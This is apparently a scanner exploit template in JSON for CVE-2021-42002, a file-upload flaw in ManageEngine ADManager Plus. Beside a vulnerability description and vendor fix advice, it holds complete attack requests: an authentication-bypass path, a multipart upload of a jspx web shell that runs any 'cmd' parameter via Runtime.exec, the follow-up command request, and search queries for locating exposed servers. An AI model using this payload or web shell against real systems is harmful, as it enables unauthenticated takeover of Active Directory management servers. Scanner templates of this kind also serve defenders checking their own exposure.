
{
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button.<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114: a filter bypass leads to file-upload remote code execution. This&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Product": "ManageEngine ADManager Plus",
"Homepage": "https://www.manageengine.com/",
"DisclosureDate": "2021-11-11",
"Author": "Flip_FI",
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"Level": "3",
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious jspx file, then remotely execute arbitrary system commands and gain control of the server, which is a severe risk.<br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; please update promptly:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"References": [
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": false,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "GET",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "c4ca4238a0b923820dcc509a6f75849b",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "POST",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "cmd={{{cmd}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([\\w\\W]+)"
]
}
],
"Tags": [
"Code Execution",
"File Upload"
],
"VulType": [
"Code Execution",
"File Upload"
],
"CVEIDs": [
"CVE-2021-42002"
],
"CNNVD": [
"CNNVD-202111-1073"
],
"CNVD": [
"CNVD-2021-88234"
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus &lt;= 7114 存在权限绕过漏洞导致未授权用户允许上传JSPX文件至网站目录达到任意代码执行目的。</span></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件可远程执行任意系统命令获取服务器权限风险极大</span></span></p>",
"VulType": [
"代码执行",
"文件上传"
],
"Tags": [
"代码执行",
"文件上传"
]
},
"EN": {
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button.<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114: a filter bypass leads to file-upload remote code execution. This&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; please update promptly:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious jspx file, then remotely execute arbitrary system commands and gain control of the server, which is a severe risk.<br></p>",
"VulType": [
"Code Execution",
"File Upload"
],
"Tags": [
"Code Execution",
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}